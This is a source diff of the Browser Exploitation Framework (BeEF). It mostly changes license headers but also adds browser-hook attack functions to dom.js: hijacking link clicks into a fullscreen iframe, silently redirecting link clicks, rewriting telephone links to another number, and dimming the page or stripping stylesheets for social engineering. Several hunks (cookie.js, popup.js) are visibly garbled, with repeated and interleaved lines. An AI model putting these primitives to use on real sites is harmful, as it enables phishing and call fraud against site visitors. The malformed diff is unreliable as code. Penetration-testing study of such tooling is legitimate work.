-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module API
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module API
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Core
@@ -34,6 +24,8 @@ require 'core/main/handlers/browserdetails'
 # @note Include the network stack
 require 'core/main/network_stack/handlers/dynamicreconstruction'
 require 'core/main/network_stack/handlers/redirector'
 require 'core/main/network_stack/handlers/raw'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
@@ -50,6 +42,7 @@ require 'core/hbmanager'
 ## @note Include RESTful API
 require 'core/main/rest/handlers/hookedbrowsers'
 require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
 require 'core/main/rest/api'
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
@@ -34,6 +24,7 @@ require 'core/main/constants/browsers'
 require 'core/main/constants/commandmodule'
 require 'core/main/constants/distributedengine'
 require 'core/main/constants/os'
 require 'core/main/constants/hardware'
 # @note Include core modules for beef
 require 'core/main/configuration'
--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Extension
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Extensions
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Filters
--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Filters
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Filters
@@ -47,6 +37,16 @@ module Filters
    true
  end
  # Check the Hardware name value - for example, 'iPhone'
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid Hardware name characters
  def self.is_valid_hwname?(str)
    return false if not is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length < 2
    true
  end
  # Verify the browser version string is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser version characters
--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Filters
--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF  
 module Filters
--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Filters
--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module HBManager
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 #   Licensed under the Apache License, Version 2.0 (the "License");
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 # @note Include here all the gems we are using
 require 'rubygems'
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -0,0 +1,47 @@
 //
 // Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 beef.are = {
  init:function(){
   var Jools = require('jools');
   this.ruleEngine = new Jools();
  },
  send:function(module){
    // there will probably be some other stuff here before things are finished
    this.commands.push(module);
  },
  execute:function(inputs){
    this.rulesEngine.execute(input);
  },
  cache_modules:function(modules){},
  rules:[
    {
      'name':"exec_no_input",
      'condition':function(command,browser){
          //need to figure out how to handle the inputs
          return (!command['inputs'] || command['inputs'].length == 0)
       },
      'consequence':function(command,browser){}
    },
    {
      'name':"module_has_sibling",
      'condition':function(command,commands){
        return false;
      },
      'consequence':function(command,commands){}
    },
    {
      'name':"module_depends_on_module",
      'condition':function(command,commands){
        return false;
      },
      'consequence':function(command,commands){}
    }
  ],
  commands:[],
  results:[]
 };
 beef.regCmp("beef.are");
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,27 +1,16 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * BeEF JS Library <%= @beef_version %>
- * http://beef.googlecode.com/
+ * Register the BeEF JS on the window object.
 */
 $j = jQuery.noConflict();
 //<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>';
 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 	var BeefJS = {
@@ -42,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
                /**
                 * Adds a function to display debug messages (wraps console.log())
                 * @param: {string} the debug string to return
                 */
                debug: function(msg) {
                    if (!<%= @client_debug %>) return;
                    if (typeof console == "object" && typeof console.log == "function") {
                        console.log(msg);
                    } else {
                        // TODO: maybe add a callback to BeEF server for debugging purposes
                        //window.alert(msg);
                    }
                },
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,110 +1,101 @@
-//
+//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
-//   you may not use this file except in compliance with the License.
+//
-//   You may obtain a copy of the License at
+
-//
+/*!
-//       http://www.apache.org/licenses/LICENSE-2.0
+ * @literal object: beef.browser.cookie
-//
+ * 
-//   Unless required by applicable law or agreed to in writing, software
+ * Provides fuctions for working with cookies. 
-//   distributed under the License is distributed on an "AS IS" BASIS,
+ * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * Original author unknown.
-//   See the License for the specific language governing permissions and
+ * 
-//   limitations under the License.
+ */
-//
+beef.browser.cookie = {
-/*!
+	
- * @literal object: beef.browser.cookie
+		setCookie: function (name, value, expires, path, domain, secure) 
- * 
+		{
- * Provides fuctions for working with cookies. 
+	
- * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
+			var today = new Date();
- * Original author unknown.
+			today.setTime( today.getTime() );
- * 
+	
- */
+			if ( expires )
-beef.browser.cookie = {
+			{
-	
+				expires = expires * 1000 * 60 * 60 * 24;
-		setCookie: function (name, value, expires, path, domain, secure) 
+			}
-		{
+			var expires_date = new Date( today.getTime() + (expires) );
-	
+	
-			var today = new Date();
+			document.cookie = name + "=" +escape( value ) +
-			today.setTime( today.getTime() );
+				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
-	
+				( ( path ) ? ";path=" + path : "" ) +
-			if ( expires )
+				( ( domain ) ? ";domain=" + domain : "" ) +
-			{
+				( ( secure ) ? ";secure" : "" );
-				expires = expires * 1000 * 60 * 60 * 24;
+		},
-			}
+
-			var expires_date = new Date( today.getTime() + (expires) );
+		getCookie: function(name) 
-	
+		{
-			document.cookie = name + "=" +escape( value ) +
+			var a_all_cookies = document.cookie.split( ';' );
-				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
+			var a_temp_cookie = '';
-				( ( path ) ? ";path=" + path : "" ) +
+			var cookie_name = '';
-				( ( domain ) ? ";domain=" + domain : "" ) +
+			var cookie_value = '';
-				( ( secure ) ? ";secure" : "" );
+			var b_cookie_found = false;
-		},
+			
-
+			for ( i = 0; i < a_all_cookies.length; i++ )
-		getCookie: function(name) 
+			{
-		{
+				a_temp_cookie = a_all_cookies[i].split( '=' );
-			var a_all_cookies = document.cookie.split( ';' );
+				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
-			var a_temp_cookie = '';
+				if ( cookie_name == name )
-			var cookie_name = '';
+				{
-			var cookie_value = '';
+					b_cookie_found = true;
-			var b_cookie_found = false;
+					if ( a_temp_cookie.length > 1 )
-			
+					{
-			for ( i = 0; i < a_all_cookies.length; i++ )
+						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
-			{
+					}
-				a_temp_cookie = a_all_cookies[i].split( '=' );
+					return cookie_value;
-				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
+					break;
-				if ( cookie_name == name )
+				}
-				{
+				a_temp_cookie = null;
-					b_cookie_found = true;
+				cookie_name = '';
-					if ( a_temp_cookie.length > 1 )
+			}
-					{
+			if ( !b_cookie_found )
-						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
+			{
-					}
+				return null;
-					return cookie_value;
+			}
-					break;
+		},
-				}
+
-				a_temp_cookie = null;
+		deleteCookie: function (name, path, domain) 
-				cookie_name = '';
+		{
-			}
+			if ( this.getCookie(name) ) document.cookie = name + "=" +
-			if ( !b_cookie_found )
+			( ( path ) ? ";path=" + path : "") +
-			{
+			( ( domain ) ? ";domain=" + domain : "" ) +
-				return null;
+			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
-			}
+		},
-		},
+		
-
+		hasSessionCookies: function (name)
-		deleteCookie: function (name, path, domain) 
+		{
-		{
+			var name = name || "cookie";
-			if ( this.getCookie(name) ) document.cookie = name + "=" +
+			if (name == "") name = "cookie";
-			( ( path ) ? ";path=" + path : "") +
+			this.setCookie( name, 'none', '', '/', '', '' );
-			( ( domain ) ? ";domain=" + domain : "" ) +
+
-			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-		},
+			this.deleteCookie(name, '/', '');
-		
+			return cookiesEnabled;
-		hasSessionCookies: function (name)
+			
-		{
+		},
-			var name = name || "cookie";
+
-			if (name == "") name = "cookie";
+		hasPersistentCookies: function (name)
-			this.setCookie( name, 'none', '', '/', '', '' );
+		{
-
+			var name = name || "cookie";
-			cookiesEnabled = (this.getCookie(name) == null)? false:true;
+			if (name == "") name = "cookie";
-			this.deleteCookie(name, '/', '');
+			this.setCookie( name, 'none', 1, '/', '', '' );
-			return cookiesEnabled;
+
-			
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-		},
+			this.deleteCookie(name, '/', '');
-
+			return cookiesEnabled;
-		hasPersistentCookies: function (name)
+			
-		{
+		}	
-			var name = name || "cookie";
+					
-			if (name == "") name = "cookie";
+};
-			this.setCookie( name, 'none', 1, '/', '', '' );
+
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');
 			return cookiesEnabled;
 		}	
 };
 beef.regCmp('beef.browser.cookie');
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,39 +1,30 @@
-//
+//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
-//   you may not use this file except in compliance with the License.
+//
-//   You may obtain a copy of the License at
+
-//
+/*!
-//       http://www.apache.org/licenses/LICENSE-2.0
+ * @literal object: beef.browser.popup
-//
+ * 
-//   Unless required by applicable law or agreed to in writing, software
+ * Provides fuctions for working with cookies. 
-//   distributed under the License is distributed on an "AS IS" BASIS,
+ * Several functions adopted from http://davidwalsh.name/popup-block-javascript
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * Original author unknown.
-//   See the License for the specific language governing permissions and
+ * 
-//   limitations under the License.
+ */
-//
+beef.browser.popup = {
-/*!
+	
- * @literal object: beef.browser.popup
+		blocker_enabled: function ()
- * 
+		{
- * Provides fuctions for working with cookies. 
+			screenParams = beef.browser.getScreenSize();
- * Several functions adopted from http://davidwalsh.name/popup-block-javascript
+			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
- * Original author unknown.
+			if (popUp == null || typeof(popUp)=='undefined') {   
- * 
+			  	return true;
- */
+			} else {   
-beef.browser.popup = {
+				popUp.close();
-	
+				return false;
-		blocker_enbabled: function ()
+			}
-		{
+		}
-			screenParams = beef.browser.getScreenSize();
+};
-			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
+
 			if (popUp == null || typeof(popUp)=='undefined') {   
 			  	return true;
 			} else {   
 				popUp.close();
 				return false;
 			}
 		}
 };
 beef.regCmp('beef.browser.popup');
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-//
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+// See the file 'doc/COPYING' for copying permission
 //   you may not use this file except in compliance with the License.
 //   You may obtain a copy of the License at
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 /*!
 * @literal object: beef.dom
 *
@@ -85,6 +76,30 @@ beef.dom = {
 		return iframe;
 	},
 	/**
 	 * Returns the highest current z-index
 	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
 	 * @return: {Integer} Highest z-index in the DOM
 	 * OR
 	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
 	 */
 	getHighestZindex: function(include_id) {
 		var highest = {'height':0, 'elem':''};
 		$j('*').each(function() {
 			var current_high = parseInt($j(this).css("zIndex"),10);
 			if (current_high > highest.height) {
 				highest.height = current_high;
 				highest.elem = $j(this).attr('id');
 			}
 		});
 		if (include_id) {
 			return highest;
 		} else {
 			return highest.height;
 		}
 	},
 	/**
     * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -104,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
+		if (type == 'hidden') {
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
 		} else if (type == 'fullscreen') {
 			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
 			$j('body').css({'padding':'0px', 'margin':'0px'});
 		} else {
 			css = styles;
 			$j('body').css({'padding':'0px', 'margin':'0px'});
 		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		if (form_submit && form_action)
@@ -117,6 +139,94 @@ beef.dom = {
 		}
 		return iframe;
 	},
    /**
     * Load the link (href value) in an overlay foreground iFrame.
     * The BeEF hook continues to run in background.
     * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
     * Framebusting techniques, this will not work.
     */
    persistentIframe: function(){
        $j('a').click(function(e) {
            if ($j(this).attr('href') != '')
            {
                e.preventDefault();
                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
                $j(document).attr('title', $j(this).html());
                document.body.scroll = "no";
                document.documentElement.style.overflow = 'hidden';
            }
        });
    },
    /**
     * Load a full screen div that is black, or, transparent
     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
     *           // By default this is 70 
     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
     *           // By default this will use beef.dom.getHighestZindex to always go to the top
     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
     *           // By default this is #000000
     */
 	grayOut: function(vis, options) {
 	  // in any order.  Pass only the properties you need to set.
 	  var options = options || {};
 	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
 	  var opacity = options.opacity || 70;
 	  var opaque = (opacity / 100);
 	  var bgcolor = options.bgcolor || '#000000';
 	  var dark=document.getElementById('darkenScreenObject');
 	  if (!dark) {
 	    // The dark layer doesn't exist, it's never been created.  So we'll
 	    // create it here and apply some basic styles.
 	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
 	    var tbody = document.getElementsByTagName("body")[0];
 	    var tnode = document.createElement('div');           // Create the layer.
 	        tnode.style.position='absolute';                 // Position absolutely
 	        tnode.style.top='0px';                           // In the top
 	        tnode.style.left='0px';                          // Left corner of the page
 	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
 	        tnode.style.display='none';                      // Start out Hidden
 	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
 	    tbody.appendChild(tnode);                            // Add it to the web page
 	    dark=document.getElementById('darkenScreenObject');  // Get the object.
 	  }
 	  if (vis) {
 	    // Calculate the page width and height 
 	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
 	        var pageWidth = document.body.scrollWidth+'px';
 	        var pageHeight = document.body.scrollHeight+'px';
 	    } else if( document.body.offsetWidth ) {
 	      var pageWidth = document.body.offsetWidth+'px';
 	      var pageHeight = document.body.offsetHeight+'px';
 	    } else {
 	       var pageWidth='100%';
 	       var pageHeight='100%';
 	    }
 	    //set the shader to cover the entire page and make it visible.
 	    dark.style.opacity=opaque;
 	    dark.style.MozOpacity=opaque;
 	    dark.style.filter='alpha(opacity='+opacity+')';
 	    dark.style.zIndex=zindex;
 	    dark.style.backgroundColor=bgcolor;
 	    dark.style.width= pageWidth;
 	    dark.style.height= pageHeight;
 	    dark.style.display='block';
 	  } else {
 	     dark.style.display='none';
 	  }
 	},
 	/**
 	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
 	 *  or, re-writing a document this is useful.
 	 */
 	removeStylesheets: function() {
 		$j('link[rel=stylesheet]').remove();
 		$j('style').remove();
 	},
 	/**
     * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -168,6 +278,23 @@ beef.dom = {
 		}).length;
 	},
 	/**
 	 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
 	 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
 	 * @param: {String} url: the url to be rewritten
 	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
 	 * @return: {Number} the amount of links found in the DOM and rewritten.
 	 */
 	rewriteLinksClickEvents: function(url, selector) {
 		var sel = (selector == null) ? 'a' : selector;
 		return $j(sel).each(function() {
 			if ($j(this).attr('href') != null)
 			{
 				$j(this).click(function() {this.href=url});
 			}
 		}).length;
 	},
 	/**
     * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
 	 * @param: {String} old_protocol: the old link protocol to be rewritten
@@ -194,6 +321,31 @@ beef.dom = {
 		return count;
 	},
 	/**
 	 * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
 	 * @param: {String} new_number: the new link telephone number to be written
 	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
 	 * @return: {Number} the amount of links found in the DOM and rewritten.
 	 */
 	rewriteTelLinks: function(new_number, selector) {
 		var count = 0;
 		var re = new RegExp("tel:/?/?.*", "gi");
 		var sel = (selector == null) ? 'a' : selector;
 		$j(sel).each(function() {
 			if ($j(this).attr('href') != null) {
 				var url = $j(this).attr('href');
 				if (url.match(re)) {
 					$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
 					count++;
 				}
 			}
 		});
 		return count;
 	},
    /**
